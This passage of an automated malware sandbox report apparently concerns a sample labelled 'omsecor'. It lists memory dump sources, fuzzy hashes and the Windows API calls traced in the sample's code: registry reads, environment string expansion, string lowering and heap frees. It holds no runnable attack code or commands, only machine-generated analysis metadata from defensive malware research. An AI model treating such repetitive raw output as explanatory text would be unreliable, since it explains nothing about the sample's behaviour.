                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Open
                                                                                                                                                                                                                • String ID: Build$SOFTWARE\Microsoft\Internet Explorer$w,@
                                                                                                                                                                                                                • API String ID: 71445658-3061378640
                                                                                                                                                                                                                • Opcode ID: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                                                                                                                                                                                                                • Instruction ID: 930cfdd3d9e2cf302383723a85cc45ac24d6ba1b6d45bcf7a76994dd36721e6e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FBE08672664218FAEF009B929C07FDA77ACDB00758F20086AF502F10C1DAB5F714D6AC
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                                                                                                                                                                                                                  • Part of subcall function 0040845D: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000008,00000000,?,?,004084C5,?,?,?,00000008,?,00403796,?), ref: 00408475
• Part of subcall function 0040845D: RegCloseKey.ADVAPI32(?,?,004084C5,?,?,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408484
• ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408524
• GetProcessHeap.KERNEL32(00000000,00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408534
• HeapFree.KERNEL32(00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 0040853B
Memory Dump Source
• Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
Similarity
• API ID: Heap$CloseEnvironmentExpandFreeOpenProcessQueryStringsValue
• String ID:
• API String ID: 3604167287-0
• Opcode ID: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
• Instruction ID: 704a8cbe2313c99ccb7bf4cac6d27c9c5720caa44ca6f9902b9fd9ccb38d811f
• Opcode Fuzzy Hash: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
• Instruction Fuzzy Hash: 0521C871900626BBDF205B748E45ABF3668EF05328F10063EF561F22D0EB758D508658
APIs
• CharLowerW.USER32(00408E44,00000000,00000000,?,00408E44,00408795), ref: 004095A4
• CharLowerW.USER32(00408795), ref: 004095D8
• SysFreeString.OLEAUT32(00408795), ref: 00409608
• SysFreeString.OLEAUT32(00408E44), ref: 0040960D
Memory Dump Source
• Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
Similarity
• API ID: CharFreeLowerString
• String ID:
• API String ID: 2335467167-0
• Opcode ID: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
• Instruction ID: 6911929459278785efe31e607170db17e103bee024a9a22ae291265c1613d99e
• Opcode Fuzzy Hash: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
• Instruction Fuzzy Hash: 20116D72D00108BBDB019F9ADC85B9E7BB8EF44305F1544BAE405F21A1D779AE409F44
APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004081A3
Strings
Memory Dump Source
• Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: -
• API String ID: 885266447-2547889144
• Opcode ID: b815d9a6725b7b7d4663accafdf12bc662ce9b6e2c1759233b63132321253c45
• Instruction ID: cbf3f064ca1262f0759db58cdf0f181467b31290bd4ebff5f053a9a619aca6df
• Opcode Fuzzy Hash: b815d9a6725b7b7d4663accafdf12bc662ce9b6e2c1759233b63132321253c45
• Instruction Fuzzy Hash: 58415D31D0422699CB2177B98E417BB61A9DF44758F1440BFF9C0B72C2EEBC5D8581AE